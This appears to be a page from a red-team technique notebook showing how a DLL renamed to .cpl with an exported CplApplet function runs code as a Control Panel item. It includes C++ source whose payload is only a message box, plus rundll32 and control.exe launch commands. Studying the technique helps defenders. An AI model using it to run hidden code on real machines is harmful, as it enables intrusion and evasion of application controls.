Red Teaming Experiments
Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
What is this?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
T1117: regsvr32
T1170: MSHTA
T1196: Control Panel Item
Executing Code as a Control Panel Item through an Exported Cplapplet Function
Code Execution through Control Panel Add-ins
T1191: CMSTP
T1118: InstallUtil
Using MSBuild to Execute Shellcode in C#
T1202: Forfiles Indirect Command Execution
Application Whitelisting Bypass with WMIC and XSL
Powershell Without Powershell.exe
Powershell Constrained Language Mode ByPass
Forcing Iexplore.exe to Load a Malicious DLL via COM Abuse
T1216: pubprn.vbs Signed Script Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Windows Kernel / Internals
Exploring Process Environment Block
ETW: Event Tracing for Windows 101
Parsing PE File Headers with C++
Exploring Injected Threads
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered by GitBook

Executing Code as a Control Panel Item through an Exported Cplapplet Function

This is a quick note that shows how to execute code in a .cpl file, which is a regular DLL file representing a Control Panel item.

The .cpl file needs to export a function CplApplet in order to be recognized by Windows as a Control Panel item.

Once the DLL is compiled and renamed to .CPL, it can simply be double clicked and executed like a regular Windows .exe file.

Code

item.cpl
// dllmain.cpp : Defines the entry point for the DLL application.
#include "stdafx.h"
#include <Windows.h>
​
//Cplapplet
extern "C" __declspec(dllexport) LONG Cplapplet(
	HWND hwndCpl,
	UINT msg,
	LPARAM lParam1,
	LPARAM lParam2
)
{
	MessageBoxA(NULL, "Hey there, I am now your control panel item you know.", "Control Panel", 0);
	return 1;
}
​
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
	{
		Cplapplet(NULL, NULL, NULL, NULL);
	}
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

Once the DLL is compiled, we can see our exported function Cplapplet:

Demo

Below shows that double-clicking the .cpl item is enough to launch it:

CPL file can also be launched with control.exe <pathtothe.cpl> like so:

or with rundll32:

attacker@target
rundll32 shell32, Control_RunDLL \\VBOXSVR\Experiments\cpldoubleclick
\cpldoubleclick\Debug\cpldoubleclick.cpl

References

Previous
T1196: Control Panel Item
Next
Code Execution through Control Panel Add-ins
Last updated 12 months ago
Contents
Code
Demo
References